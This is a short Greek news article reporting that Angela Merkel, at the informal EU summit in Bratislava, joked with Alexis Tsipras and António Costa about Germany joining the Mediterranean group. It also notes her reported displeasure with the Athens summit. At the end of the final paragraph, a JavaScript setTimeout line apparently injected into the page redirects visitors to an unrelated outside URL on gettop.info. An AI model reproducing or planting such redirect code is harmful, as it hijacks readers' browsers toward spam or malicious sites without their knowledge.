Με το χαμόγελο η Μέρκελ «την είπε» σε Τσίπρα και Κόστα για τη Σύνοδο της Αθήνας

0
11

 

Και ενώ ο πρωθυπουργός Αλέξης Τσίπρας, είχε χαλαρό διάλογο με τον πρωθυπουργό της Πορτογαλίας Αντόνιο Κόστα, στο περιθώριο των εργασιών της άτυπης Συνόδου των 27 αρχηγών κρατών και κυβερνήσεων της Ε.Ε. στην Μπρατισλάβα, τους πλησίασε η Γερμανίδα καγκελάριος Άνγκελα Μέρκελ.
Ξεκίνησαν τότε,σύμφωνα με πληροφορίες μια συζήτηση για την ομορφιά του Νότου τους καλοκαιρινούς μήνες και τις διακοπές στις θάλασσες του.

Οι ίδιες πληροφορίες αναφέρουν πως η κα Μέρκελ είπε τότε «αστειευόμενη» ότι ίσως η Γερμανία πρέπει να γίνει μέλος της ευρωμεσογειακής ομάδας, με τον Αντόνιο Κόστα να της λέει ότι στην επόμενο Σύνοδο στην Λισσαβώνα θα την προσκαλέσουν.

Σημειώνεται ότι στη σύνοδο της Αθήνας την περασμένη Παρασκευή είχε αποφασιστεί ότι η δεύτερη σύνοδος των Μεσογειακών Χωρών της ΕΕ θα διεξαχθεί στην πορτογαλική πρωτεύουσα.

Είναι γνωστό μάλιστα ότι η Γερμανίδα καγκελάριος έχει εκφράσει τη δυσαρέσκεια της για τη Σύνοδο των χωρών του Νότου στην Αθήνα, θεωρώντας την ως «βήμα» εναντίον της ίδιας και της Γερμανίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here